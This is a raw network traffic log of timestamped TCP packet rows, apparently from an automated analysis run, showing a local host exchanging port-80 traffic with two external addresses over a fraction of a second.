Jan 14, 2022 00:16:15.666465044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.666568995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.666671038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.666776896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.666954994 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.667054892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.667152882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.667251110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.667355061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.667454004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.667558908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.667664051 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.667764902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.667923927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.668026924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.668126106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.668226004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.668323040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.668426991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.668529034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.668631077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.668731928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.668874979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.668982029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.670928955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.671071053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.671197891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.671324968 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.671458006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.671583891 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.671711922 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.671855927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.671982050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.672110081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.672230005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.672362089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.672487020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.672616005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.672750950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.672913074 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.673032999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.673161983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.673285961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.673409939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.673536062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.673662901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.673810005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.673938036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.674066067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.674189091 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.674314022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.674422979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.674510002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.674606085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.674700975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.683798075 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.683824062 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.683845043 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.683864117 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.684036016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.684547901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.684736013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.684911013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.685039997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.685177088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.685307980 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.685426950 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.685518026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.685597897 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.685606003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.685733080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.685854912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.685941935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.686032057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.686167002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.686300039 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.686425924 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.686558962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.686692953 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.686850071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.686947107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.687036991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.687134027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.687228918 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.687340021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.687472105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.687601089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.687736988 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.687891006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.687999010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.688023090 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688066006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688106060 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688112974 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.688144922 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688184023 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688188076 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.688222885 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688260078 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688265085 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.688298941 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688337088 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688345909 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.688376904 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688417912 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688421965 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.688455105 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688494921 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688498974 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.688534021 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688576937 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.688615084 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688652992 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688692093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688695908 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.688733101 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688767910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688791037 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.688805103 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688843012 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688846111 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.688879967 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.688901901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.688920975 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.689039946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.689147949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.689251900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.689352036 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.689451933 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.689558983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.689657927 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.689666986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.689697027 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.689735889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.689753056 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.689770937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.689774036 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.689810991 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.689817905 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.689867973 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.689917088 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.689917088 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.689956903 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.689995050 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690001965 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.690033913 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690071106 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690079927 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.690110922 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690149069 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690152884 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.690186024 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690223932 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690227032 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.690373898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.690433025 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690474033 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690485954 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.690514088 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690551043 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690558910 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.690589905 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690628052 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690630913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.690649033 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.690669060 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690707922 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690711021 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.690746069 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690783024 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690797091 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.690821886 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.690861940 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.691050053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.691179991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.691312075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.691401958 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.691504002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.691519022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.691559076 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.691754103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.691904068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.691994905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.691996098 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692034006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692071915 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692079067 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692114115 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692151070 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692161083 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692189932 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692228079 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692234993 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692266941 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692305088 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692310095 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692342997 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692382097 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692388058 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692420959 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692456961 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692466021 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692496061 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692533970 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692547083 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692570925 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692619085 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692620993 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692657948 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692694902 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692713022 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692734957 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692775011 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692797899 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692815065 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692854881 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692873001 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692892075 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692930937 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.692941904 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.692971945 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693008900 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693022013 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693048954 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693084955 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693093061 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693125010 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693164110 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693164110 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693203926 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693240881 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693247080 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693280935 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693315983 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693325043 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693356037 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693392992 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693397999 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693433046 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693471909 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693475962 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693510056 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693547964 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693566084 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693588972 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693625927 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693631887 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693665981 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693702936 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693707943 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693742037 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693783045 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693799019 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693819046 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693860054 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693881035 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693921089 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693959951 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.693962097 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.693995953 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.694035053 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.694036961 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.694073915 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.694113016 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.694125891 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.694150925 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.694200993 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.694298983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.694459915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.694602013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.694731951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.695247889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.695342064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.695430040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.695635080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.695743084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.695868015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.695966005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.696077108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.696182013 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.696274042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.696365118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.696465015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.696557045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.696655035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.696753025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.698901892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.699011087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.699121952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.699228048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.699362040 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.699492931 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.699584961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.699681044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.709878922 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.709923983 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.712974072 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.713007927 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.718914986 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.719101906 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.719130039 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.719222069 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.719250917 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.722531080 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.729310036 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.730832100 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.730873108 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.732247114 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.732716084 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.732742071 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.733196974 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.733223915 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.733792067 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.733819962 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.734004974 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.734101057 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.750832081 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.750875950 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.750901937 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.750926018 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.750955105 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751219034 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751249075 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751271963 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751298904 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751324892 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751348019 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751379013 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751404047 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751426935 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751451969 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751477957 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.751502991 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.752065897 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.757391930 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.757417917 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.762466908 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.763951063 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764004946 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.764046907 CET	80	49920	141.8.194.74	192.168.2.4
